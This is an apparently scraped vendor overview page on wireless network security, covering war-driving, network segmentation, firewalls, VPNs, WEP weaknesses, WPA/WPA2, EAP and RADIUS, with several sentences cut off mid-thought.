Navigation |
Wireless Security
Technology Overviews
Wireless Security
Wireless is preferred for networks that are temporary, require flexibility, and in which high security is not needed. Because it's particularly vulnerable to attacks, security is a primary concern when installing wireless. Hackers looking for a wireless network go "war-driving"-cruising around looking for a wireless signal to exploit. Usually war drivers are just looking for free Internet access, but sometimes they?re looking for confidential information such as credit card numbers. And many war drivers, when they locate a wireless network, will post the GPS coordinates of that network on the Internet. Although a wireless network can never be totally secure, there are important steps you can take to minimize the risk:
Know where you?re signaling. When you install a wireless network near public areas, it's very important to know where your signal is going. If it's easily picked up on the sidewalk outside your business-perhaps from a parked car across the street or from the building next door-then you?ve got a security problem. If you send a strong wireless signal into the coffee house next door to your business, chances are someone is going Separate wireless from wired to increase security. Once you separate the wireless from the wired network, insist that anything that needs to be kept secure stay on the wired network. This includes confidential data such as credit card numbers, sensitive financial data, or corporate secrets of any kind. You can, however, freely use the wireless network for less-sensitive applications such as laptops for taking notes at meetings, PCs for temporary workers, computer hookups for trade show booths, and bar-code readers for inventory. An important step in wireless security is to connect your wireless access points to switches rather than hubs. A hub connected to an access point will broadcast all data it receives on that access point to all connected devices. However, a switch isolates each port onto its own LAN segment and will only broadcast data intended for a wireless node on the access point. Another way to isolate your wireless network is to gather all access points into a separate LAN connected to the DMZ port of your firewall. This makes the wireless network accessible, yet safely outside of your main wired LAN. Hardware and software firewall systems control the flow of data in both wired and wireless networks. Use a firewall to intercept, analyze, and stop a wide range of hackers. Another security option is to use a Virtual Private Network (VPN), which works with both wired and wireless networks. A VPN protects remote access users by increasing the security of information transferred over the Internet. A VPN works by creating a private, encrypted "tunnel" from the end user's computer through the access point, the Internet, and all the way to the corporate servers. Most IT Lock it up. WEP. The current 802.11x Ethernet standards include a security protocol called Wired Equivalent Privacy (WEP). WEP encrypts each 802.11 packet separately with an RSA RC4 cipher stream generated by a 64- or 128-bit RCA key. But several cryptanalysts have identified weaknesses in the RC4's key scheduling algorithm that make the network vulnerable to hackers. Software tools such as AirSnort WEP encryption can keep out casual hackers but is clearly not adequate where high security is required. Fortunately, WEP is not the only encryption method for your wireless network-other available security protocols operate at the higher Network and Transport layers. These protocols are more difficult to crack than WEP and usually rely on a EAP-TLS. Extensible Authentication Protocol-Transport Layer Security (EAP-TLS) is the latest version of the Secure Socket Layer (SSL) protocol. EAP-TLS uses X.509 certificates for both user and server authentication and for EAP-TTLS. Extensible Authentication Protocol-Tunneled Transport Layer Security (EAP-TTLS) authentication uses a two-stage authentication process, which eliminates the i-Fi Protected Access (WPA) was introduced in 2003 to enhance wireless security, and to augment and strengthen WEP's vulnerabilities. WPA improves data encryption and user authentication, and is software upgradable for existing WEP certified products. Although no security solution is absolute, WPA is a vast improvement over WEP. It was also designed to be backward compatible with WEP and forward compatible with 802.11i. EAP through Temporal Key Integrity Protocol (TKIP). This WPA enhancement improves the data encryption of WEP. It adds four algorithms to WEP: per-packet key mixing function, message integrity code (MIC), rekeying mechanism, and an IV sequencing discipline to remove replay attacks. Enterprise-level User Authentication. To strengthen user authentication in WEP, WPA uses 802.1x and EAP. This framework uses a central authentication server, such as RADIUS, to authenticate each user on the network. WPA is available for home and enterprise networks. WPA-Personal is an encryption method that guards against unauthorized network access via a password system.
WPA-Enterprise provides stronger network security. It verifies users through a server. It also employs 128-bit encryption keys and dynamic session keys to enhance security. Wi-Fi Protected Access 2 (WPA2) is the next generation of security. Introduced in September 2004, it builds on WPA. It enhances security through stronger data protection and network access control. It's designed to provide a higher level of security so that only authorized WPA2 is backward compatible with WPA. So if you already are using WPA, you can move to WPA2 at your own pace. WPA2 comes in two versions: WPA2-Personal and WPA2-Enterprise. WPA2-Personal is designed for the home or SOHO wireless network. It builds on WPA2, and it provides stronger data protection and prevents unauthorized access through a pass phrase. WPA2-Enterprise. This system also provides stronger data protection than WPA. It also prevents unauthorized network access by verifying network users through a server. Wi-Fi Multimedia (WMM) is another security system introduced in September 2004. It's designed to bring wireless into the mainstream of consumer electronics, phones, etc. WMM enhances and improves the use of audio, video, and voice applications over a wireless network. It's based on a subset of the IEEE 802.11e WLAN QoS draft standard. WMM prioritizes streams of content and optimizes how the network allocates bandwidth among competing applications. Another standard element of many wireless security systems is Remote Access Dial-Up User Service (RADIUS) Authentication and Authorization. RADIUS allows only approved users, via user name and password, access to the network. The server verifies the user before access is given. Different levels of access can be set up as well. Pay attention and weigh the risks.
With a wireless network, as in any other network, it's important to have a security plan and then implement it. The biggest problem with wireless security is that network administrators often fail to take even the simplest of steps to ensure security, do not deploy WPA or WPA2, fail to change the default passwords and network name, and don't place access Weigh risks against benefits when you decide whether wireless is worth implementing. Depending on your situation, the convenience of wireless might outweigh the risk-you may decide that your wireless network is secure enough to take a chance with sensitive information. An To talk to Tech Support, please call us at 055 451 70 71 or use our free of charge Callback Service. |